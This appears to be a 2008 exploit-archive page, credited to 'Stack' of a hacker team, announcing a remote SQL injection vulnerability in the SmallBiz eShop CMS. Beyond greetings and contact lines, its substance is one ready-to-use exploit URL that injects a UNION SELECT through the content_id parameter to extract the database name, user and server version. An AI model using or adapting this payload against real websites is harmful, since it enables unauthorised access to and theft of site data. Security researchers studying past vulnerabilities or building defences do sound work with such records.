SmallBiz eShop (content_id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SmallBiz eShop (content_id) Remote SQL Injection Vulnerability
# Published : 2008-04-14
# Author : Stack
# Previous Title : SmallBiz 4 Seasons CMS Remote SQL Injection Vulnerability
# Next Title : BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability

###################################################
[~] Powered by SmallBiz eShop CMS Remote Sql ?°nj. Vuln.
                                                                                                               
[~] Founder: Stack-Terrorist [v40] [ Moroc00 Hacker ]
[~] HomePage: http://www.v4-team.com
[~] Greatz : To all Hackerz from Moroc00 & All My Friends . . .
[~] Contact: admin@v4-team.com
[~] Exploit :
http://www.xxx.co.il/index.php?content_id=-20'%20union%20select%20convert(concat(database(),char(58),user(),char(58),version()),char)/*
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# www.Syue.com [2008-04-14]